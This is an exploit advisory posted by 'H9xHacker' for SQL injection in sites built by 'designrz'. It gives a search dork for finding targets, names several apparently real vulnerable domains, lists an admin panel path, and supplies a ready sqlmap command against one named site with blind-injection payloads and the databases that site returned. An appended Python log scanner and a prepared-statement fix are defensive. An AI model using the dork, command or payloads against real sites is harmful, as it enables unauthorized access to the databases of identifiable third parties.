Website designed & developed by designrz. SQL Injection vulnerability

2019.07.07
H9xHacker (SA)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title:Website designed & developed by designrz. SQL Injection vulnerability
# Date:07.07.2019
# Dork:inurl:.php?id= intext:website designed & developed by designrz.
# Exploit Author:H9xHacker
# Tested on:Linux

Reverse check bing.com ip:170.10.164.63 .php?id= (This server contains 236 domains)

#Demo
iskconamritsar.com/programs2.php?id=11
admissionoverseas.com/book-appointment.php?id=41
dcmgroup.in/education.php?id=7

# Admin control panel path
site/com/cms/index.php

# Poc:
sqlmap.py --level=5 --risk=3 --timeout=10 --threads=10 --random-agent -u 'www.iskconamritsar.com/programs2.php?id=24' --no-cast --batch --dbs

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: id=-6246' OR 9878=9878-- cSiP

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=24' AND SLEEP(5)-- SiPf
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[*] information_schema
[*] iskconas_iskcon

----------------------------------
Greets:And All My Friends
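Added example, not part of the original advisory: a log check that flags requests whose `id` GET parameter is not a plain integer and labels the two payload classes sqlmap reported above. The Apache combined log format, the path `/page.php`, the client addresses and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside an Apache combined-format log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Payload classes from the sqlmap output above.
TAUTOLOGY = re.compile(r"\b(?:OR|AND)\s+(\d+)\s*=\s*\1\b", re.I)
TIME_DELAY = re.compile(r"\bSLEEP\s*\(", re.I)

def classify_id(value):
    """Return a label for a suspicious `id` value, or None for a plain integer."""
    if value.isascii() and value.isdigit():
        return None
    if TIME_DELAY.search(value):
        return "time-based blind"
    if TAUTOLOGY.search(value):
        return "boolean-based blind"
    return "non-numeric id"

def scan(lines):
    """Yield (client_ip, path, label) for each log line with a suspicious id."""
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        # parse_qs percent-decodes values and turns '+' into a space.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            label = classify_id(value)
            if label:
                yield line.split()[0], url.path, label

# Constructed sample log lines (documentation IP range, hypothetical path).
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Jul/2019:10:00:01 +0000] "GET /page.php?id=24 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [07/Jul/2019:10:00:02 +0000] "GET /page.php?id=-6246%27%20OR%209878%3D9878--%20cSiP HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [07/Jul/2019:10:00:08 +0000] "GET /page.php?id=24%27+AND+SLEEP%285%29--+SiPf HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [07/Jul/2019:10:00:09 +0000] "GET /page.php?id=abc HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, label in scan(SAMPLE_LOG):
        print(ip, path, label)
```

A hit here is a triage signal only; the fix on the application side is to bind `id` as an integer parameter in a prepared statement rather than concatenating it into the query.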

